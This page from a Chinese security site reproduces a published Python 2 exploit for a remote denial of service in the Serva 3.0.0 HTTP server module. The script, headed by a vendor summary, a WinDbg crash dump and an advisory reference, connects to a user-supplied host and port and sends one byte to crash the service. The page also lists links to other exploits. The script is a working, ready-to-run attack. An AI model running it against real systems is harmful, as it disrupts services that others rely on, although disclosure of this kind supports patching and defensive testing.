首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Serva 3.0.0 HTTP Server - Denial of Service 来源：http://www.zeroscience.mk 作者：LiquidWorm 发布时间：2016-12-13   #!/usr/bin/env python # # # Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit # # # Vendor: Patrick Masotta # Product web page: http://www.vercot.com # Affected version: 3.0.0.1001 (Community, Pro, 32/64bit) # # Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application. # It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles # on a single exe all of the underlying server protocols and services required by the # most complex PXE network boot/install scenarios simultaneously delivering Windows and # non-Windows assets to BIOS and UEFI based targets. # # Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests. # This can be exploited to cause a denial of service attack resulting in application crash. # # ---------------------------------------------------------------------------- # # (c1c.4bc): C++ EH exception - code e06d7363 (first chance) # (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!) # *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe # eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0 # eip=74a1c54f esp=03127510 ebp=03127560 iopl=0         nv up ei pl nz ac po nc # cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212 # KERNELBASE!RaiseException+0x58: # 74a1c54f c9              leave # 0:013> kb # # ChildEBP RetAddr  Args to Child              # 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58 # WARNING: Stack unwind information not available. Following frames may be wrong. # 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf # 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909 # 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3 # 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5 # 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01 # 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38 # # ---------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic #                             @zeroscience # # # Advisory ID: ZSL-2016-5378 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php # # # 17.11.2016 #   import sys,socket   if len(sys.argv) < 3:       print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'     print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'     sys.exit(0)   host = sys.argv[1] port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send('z') s.close   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·10-Strike Network File Search ·Microsoft Internet Explorer 9 ·OpenSSL 1.1.0a/1.1.0b - Denial ·McAfee Virus Scan Enterprise f ·Microsoft Internet Explorer 9 ·Samsung Devices KNOX Extension ·Microsoft Internet Explorer 9 ·Samsung Devices KNOX Extension ·Microsoft Internet Explorer 9 ·Nidesoft MP3 Converter 2.6.18 ·OpenSSH 7.2 - Denial of Servic ·Nagios < 4.2.2 - Arbitrary Cod   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved